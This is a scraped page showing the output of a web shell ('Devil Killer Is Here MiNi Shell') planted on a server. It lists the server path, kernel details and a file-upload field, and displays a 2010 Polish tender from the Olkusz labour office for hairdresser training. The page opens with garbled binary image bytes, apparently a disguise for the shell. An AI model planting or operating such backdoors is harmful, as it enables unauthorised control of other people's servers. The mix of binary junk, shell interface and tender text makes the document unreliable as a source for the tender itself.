JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100513/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100513/128744-N-2010.html

<p class="kh_header"><b>Olkusz: Zorganizowanie i przeprowadzenie w granicach administracyjnych miasta Olkusza usługi szkolenia w zakresie Fryzjer dla 20 osób bezrobotnych w dwóch 10 - cio osobowych grupach  w ramach Priorytetu VI Rynek pracy otwarty dla wszystkich współfinansowanego z Europejskiego Funduszu Społecznego  w ramach PO KL Poddziałanie  6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych.</b><br>
<b>Numer ogłoszenia: 128744 - 2010; data zamieszczenia: 13.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy , ul. Minkiewicza 2, 32-300 Olkusz, woj. małopolskie, tel. 032 6434348, faks 032 6430538.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup-olkusz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie w granicach administracyjnych miasta Olkusza usługi szkolenia w zakresie Fryzjer dla 20 osób bezrobotnych w dwóch 10 - cio osobowych grupach  w ramach Priorytetu VI Rynek pracy otwarty dla wszystkich współfinansowanego z Europejskiego Funduszu Społecznego  w ramach PO KL Poddziałanie  6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zorganizowanie i przeprowadzenie w granicach administracyjnych miasta Olkusza usługi szkolenia  w zakresie Fryzjer dla 20 osób bezrobotnych w dwóch 10 - cio osobowych grupach  w ramach Priorytetu VI Rynek pracy otwarty dla wszystkich współfinansowanego z Europejskiego Funduszu Społecznego  w ramach PO KL Poddziałanie  6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności zawodowej osób bezrobotnych.
2. Zamówienie ma być przeprowadzone zgodnie  z programem szkolenia, który powinien uwzględniać  zróżnicowany poziom  umiejętności  i wiedzy uczestników szkolenia.
3. Program szkolenia winien  być opracowany w oparciu o rozporządzenie Ministra Edukacji i Nauki z dnia 03.02.2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych / Dz. U. Nr 31,  poz. 216/.
4. Program szkolenia winien  być opracowany zgodnie z Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 02.03.2007 r. w sprawie szczegółowych warunków prowadzenia przez publiczne służby zatrudnienia usług rynku pracy (Dz. U. Nr 47, poz. 315) powinien zawierać w szczególności:
a) nazwę i zakres szkolenia,
b) czas trwania i sposób organizacji szkolenia,
c) wymagania wstępne  dla uczestników szkolenia,
d) cele szkolenia,
e) plan nauczania  określający  tematy  zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem  części teoretycznej i części praktycznej,
f) treści  szkolenia  w zakresie poszczególnych zajęć edukacyjnych,
g) wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
h) sposób sprawdzania efektów szkolenia.
5. Wymagana liczba godzin usługi szkoleniowej wynosi 160 godzin zegarowych, w tym egzamin wewnętrzny  wliczony w liczbę godzin szkolenia. 
Przyjmuje się, że:
-  jedna godzina zajęć teoretycznych - równa się 60 minutom i obejmuje zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą 15 minut,
-  jedna godzina zajęć z praktycznych równa się 60 minutom bez przerwy,
-  jedna godzina egzaminu wewnętrznego równa się 60 minutom bez przerwy.
5.1. Minimalna liczba godzin szkoleniowych  w ciągu jednego dnia  ma wynosić sześć godzin zegarowych, tygodniowo co najmniej 30 godzin zegarowych.
6. Program powinien obejmować następujące zagadnienia:
I. Działalność usługowa pracowni fryzjerskiej;
1) Marketing usług i obsługa klienta;
2) Organizowanie stanowiska pracy fryzjera;
II. Anatomia,  fizjologia, choroby włosów i skóry głowy;
III. Podstawowe materiały i narzędzia fryzjerskie i ich zastosowanie;
IV. Pielęgnacja i czesanie włosów;
V. Technologia fryzjerska;
1) Strzyżenie włosów i modelowanie;
2) Chemiczne zabiegi fryzjerskie;
3) Podstawy projektowania fryzur z elementami stylizacji fryzur.
Do powyższych tematów zajęć edukacyjnych należy  podać szczegółowe  treści szkolenia i wymiar godzin zajęć teoretycznych i praktycznych.
7. Celem szkolenia jest nabycie wiedzy teoretycznej i praktycznych umiejętności do pracy w zawodzie fryzjer.
8. Rezultaty szkolenia:
8.1. Po zakończeniu szkolenia uczestnicy uzyskają niezbędne umiejętności praktyczne, takie jak: 
1) znajomość technik pielęgnacji włosów,
2) umiejętność strzyżenia; 
3) umiejętność modelowania; 
4) umiejętność koloryzacji włosów; 
5) umiejętność tworzenia baleage.
8.2. W wyniku realizacji szkolenia absolwent będzie potrafił:
1) diagnozować stan włosów na podstawie przeprowadzonego wywiadu, zgodnie z zasadami postępowania fryzjerskiego;
2) zastosować urządzenia i sprzęt fryzjerski zgodnie z przeznaczeniem;
3) wykonywać zabiegi pielęgnacyjne włosów;
4) strzyc i modelować włosy przy pomocy różnych technik;
5) koloryzować włosy przy użyciu różnorodnych preparatów;
6) wykonywać baleage. 
9. Szkolenie musi być zorganizowane i przeprowadzone w granicach administracyjnych miasta Olkusza.
10. Zajęcia muszą odbywać się w pomieszczeniu/ach/ dostosowanym/ych/ do prowadzenia zajęć    szkoleniowych i odpowiednio w tym celu wyposażonym/ych/ tj. w pomieszczeniach posiadających  odpowiednie warunki  sanitarne, bezpieczeństwa, akustyczne i jakościowe. 
W przypadku zajęć praktycznych w pomieszczeniu/ach/ powinien znajdować się dostęp do ciepłej i zimnej wody umożliwiający montaż myjki fryzjerskiej.
11. Wykonawca podczas trwania szkolenia zapewni prawidłowe warunki pracy zgodne z przepisami BHP i p.poż.
12.Wykonawca zapewnia dla wszystkich uczestników szkolenia:
1) materiały dydaktyczne niezbędne przy realizacji szkolenia;
2) materiały piśmiennicze;
3) materiały ćwiczeniowe niezbędne przy realizacji szkolenia;
4) dla każdego uczestnika szkolenia  przybornik, w skład którego wchodzą co najmniej: 3 okrągłe szczotki do modelowania o zróżnicowanej szerokości, nożyczki , grzebień; 
Wykonawca musi zapewnić materiały i preparaty dla każdego z uczestników szkolenia w ilościach niezbędnych do pełnego zrealizowania programu szkolenia. 
Każdy uczestnik szkolenia ma mieć zapewnione oddzielne materiały i preparaty konieczne do wykonywania wszystkich przewidzianych programem szkolenia zabiegów. 
Po zakończeniu szkolenia materiały dydaktyczne, przybornik przechodzą na własność każdego z uczestników szkolenia.
Materiały biurowe i szkoleniowe opracowane przez wykładowców powinny zawierać logo EFS i Unii Europejskiej  oraz logo PO KL wraz z informacją: Projekt współfinansowany przez Unię Europejską  w ramach Europejskiego Funduszu Społecznego zgodnie z zasadą wizualizacji, a także informacje: Szkolenie: Fryzjer w ramach Priorytetu VI  Rynek pracy otwarty dla wszystkich współfinansowanego z Europejskiego Funduszu Społecznego  w ramach PO KL Podziałanie 6.1.3. Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności  zawodowej osób bezrobotnych.  
13.Wymaga się prowadzenia dokumentacji przebiegu szkolenia stanowiącej:
a) dziennik zajęć edukacyjnych zawierający listę obecności, wymiar godzin i tematy zajęć edukacyjnych,
b) protokół z egzaminu,
c) rejestr wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji.
14. Na jednego  uczestnika  musi przypadać  jedno stanowisko  szkoleniowe.
15. Uczestnicy szkolenia powinni być objęci opieką z ramienia instytucji szkoleniowej. Każde szkolenie powinno mieć swojego opiekuna, osobę odpowiedzialną za organizację i realizację szkolenia, wskazaną do kontaktu w umowie  stanowiącej załącznik nr 8 a  do SIWZ.
16. Wykonawca w celu podnoszenia jakości prowadzonego szkolenia zobowiązany jest do zapewnienia nadzoru wewnętrznego.
17. Wykonawca jest zobowiązany do sprawdzania efektów szkolenia na poszczególnych jego etapach wybranymi przez siebie metodami, w tym poprzez egzamin wewnętrzny.
18. W ramach udzielonego zamówienia Wykonawca  zobowiązany jest  do zorganizowania egzaminu wewnętrznego ze zdobytej  wiedzy teoretycznej i praktycznej  oraz do wydania uczestnikom szkolenia dwóch  dokumentów potwierdzających zdobycie kwalifikacji:
1) wzór zaświadczenia zgodnego z załącznikiem Nr 1 do Rozporządzenia Ministra Edukacji i Nauki z dnia 03.02.2006 r. w sprawie uzyskania i uzupełnienia przez osoby dorosłe wiedzy ogólnej, umiejętności  i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216) 
Prosimy o nie zamieszczanie na w/w dokumencie żadnych dodatkowych znaków np. logo EFS, Unii Europejskiej, logo PO KL  itp.);
2) wzór zaświadczenia, dyplom lub certyfikat o ukończeniu szkolenia zawierające logo EFS i Unii Europejskiej oraz logo PO KL wraz z informacją: Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego zgodnie z zasadą wizualizacji, a także informacje: 
Szkolenie: Fryzjer w ramach Priorytetu VI Rynek pracy otwarty dla wszystkich współfinansowanego z Europejskiego Funduszu Społecznego  w ramach PO KL  Poddziałanie  6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenie poziomu aktywności  zawodowej osób bezrobotnych. Szkolenie zorganizowane dla osób skierowanych przez Powiatowy Urząd Pracy w Olkuszu.
Logo EFS i PO KL wraz z informacją: Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego do pobrania ze strony internetowej: www.pup-olkusz.pl/zalaczniki/logo_pokl_efs.jpg
19. Zamawiający nie dopuszcza możliwości prowadzenia szkolenia metodą  e- learning..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia, określonego w specyfikacji mogą ubiegać się Wykonawcy którzy spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania tj. posiadają aktualny wpis do rejestru instytucji szkoleniowych prowadzony przez właściwy Wojewódzki Urząd Pracy, zgodnie z art. 20  ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008r. Nr 69 poz. 415 z późn. zm.) i Rozporządzeniem MG i P  z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych. Ocena spełniania warunku udziału w postępowaniu będzie przeprowadzona w oparciu o przedłożone przez Wykonawców dokumenty i oświadczenia potwierdzające jego spełnienie zgodnie z formułą  spełnia / nie spełnia. Nie spełnienie w/w warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia, określonego w specyfikacji mogą ubiegać się Wykonawcy którzy spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych dotyczące posiadania wiedzy i doświadczenia tj. wykażą się przeprowadzeniem z należytą starannością co najmniej jednego szkolenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - zawierające w programie min. 80 godz. zajęć dydaktycznych obejmujących zarówno zagadnienia  teoretyczne oraz praktyczne z zakresu fryzjerstwa. Należy uwzględnić tylko szkolenia zawierające w programie min. 80 godz. zajęć dydaktycznych  obejmujących zarówno zagadnienia teoretyczne oraz praktyczne z zakresu fryzjerstwa. Ocena spełniania warunku udziału w postępowaniu będzie przeprowadzona w oparciu o przedłożone przez Wykonawców dokumenty i oświadczenia potwierdzające jego spełnienie zgodnie z formułą  spełnia / nie spełnia. Nie spełnienie w/w warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia, określonego w specyfikacji mogą ubiegać się Wykonawcy którzy spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych dotyczące dysponowania odpowiednim potencjałem technicznym do wykonania zamówienia tj. Wykonawca  będzie dysponował:  
1) minimum 5 stanowiskami pracy dla fryzjera wyposażonymi co najmniej w fotel, lustro  i suszarkę; 
2) 10 główkami treningowymi;
3) minimum 2 prostownicami;
4) minimum 2 lokówkami;
5) minimum 1 myjką fryzjerską;
6) minimum 2 sztukami nożyczek  degażówek;
7) odzieżą ochronną dla każdego uczestnika szkolenia.
Ocena spełniania warunku udziału w postępowaniu będzie przeprowadzona w oparciu o przedłożone przez Wykonawców dokumenty i oświadczenia potwierdzające jego spełnienie zgodnie z formułą  spełnia / nie spełnia. Nie spełnienie w/w warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia, określonego w specyfikacji mogą ubiegać się Wykonawcy którzy spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych dotyczące dysponowania osobami zdolnymi do wykonania zamówienia, z których każda musi posiadać co  najmniej:
a) łącznie  pięcioletni staż  pracy dydaktycznej związanej z  przedmiotem zamówienia;
b) ukończony kurs pedagogiczny, studium  pedagogiczne, studia pedagogiczne lub inny dokument uprawniający do prowadzenia zajęć;
c) w przypadku wykładowców prowadzących zajęcia praktyczne dodatkowo wymagane jest posiadanie tytułu mistrza w zawodzie fryzjera.
Ocena spełniania warunku udziału w postępowaniu będzie przeprowadzona w oparciu o przedłożone przez Wykonawców dokumenty i oświadczenia potwierdzające jego spełnienie zgodnie z formułą  spełnia / nie spełnia. Nie spełnienie w/w warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia, określonego w specyfikacji mogą ubiegać się Wykonawcy którzy spełniają warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych dotyczące sytuacji ekonomicznej i finansowej. Ocena spełniania warunku udziału w postępowaniu będzie przeprowadzona w oparciu o przedłożone przez Wykonawców dokumenty i oświadczenia potwierdzające jego spełnienie zgodnie z formułą  spełnia / nie spełnia. Nie spełnienie w/w warunku skutkować będzie wykluczeniem Wykonawcy z postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dokumenty potwierdzające, że usługa została wykonana należycie
np. referencje, pochwały itp. (z wyłączeniem  dokumentów wystawionych Wykonawcy  przez Zamawiającego tj. PUP Olkusz) w oryginale lub w formie kserokopii potwierdzonych za zgodność z oryginałem podpisanych przez  osobę uprawnioną. Należy dołączyć  dokumenty poświadczające należyte wykonanie zamówienia  od co najmniej jednego  Zamawiającego, u którego Wykonawca zrealizował  zamówienie  z wyłączeniem  dokumentów wystawionych Wykonawcy  przez Zamawiającego tj. PUP Olkusz.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.III.4.1) W zakresie wykazania spełnienia przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy. W celu wykazania posiadania uprawnień do wykonywania określonej działalności Wykonawca zobowiązany jest złożyć
oświadczenie o aktualnym wpisie do rejestru instytucji szkoleniowych z podaniem numeru ewidencyjnego, prowadzonego przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę instytucji szkoleniowej zgodnie z art. 20 ustawy  z dnia 20 kwietnia 2004r. o promocji zatrudnienia i instytucjach rynku pracy i Rozporządzeniem MG i P  z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych - zgodnie  z załącznikiem nr 14 do SIWZ. Oświadczenie powinno być przedstawione w formie oryginału i podpisane przez Wykonawcę lub osobę upoważnioną do podpisania oferty.
2. III 4.2) W celu wykazania braku podstaw do wykluczenia na podstawie art. 24 ust. 1 ustawy, Wykonawca zobowiązany jest złożyć wraz z ofertą pisemne oświadczenie o nie zaleganiu z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne stanowiące załącznik nr 9 SIWZ, przedstawione w formie oryginału i podpisane przez Wykonawcę lub inną osobę upoważnioną do podpisania oferty. Zamawiający może żądać na wniosek okazania w/w dokumentów w ciągu 14 dni. W przypadku zażądania przez Zamawiającego w/w dokumentów winny one być  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
3. III. 4.3) W przypadku kiedy Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej należy złożyć: jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w punkcie 6.4.1 SIWZ zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Daty wystawienia stosuje się odpowiednio. Jeżeli dokumenty wyżej wymienione Wykonawca składa  w języku obcym, należy również złożyć tłumaczenie na język polski, poświadczone przez Wykonawcę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - Ilość przeprowadzonych szkoleń z zakresu objętego zamówieniem w okresie ostatnich 3 lat przed upływem terminu składania ofert - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
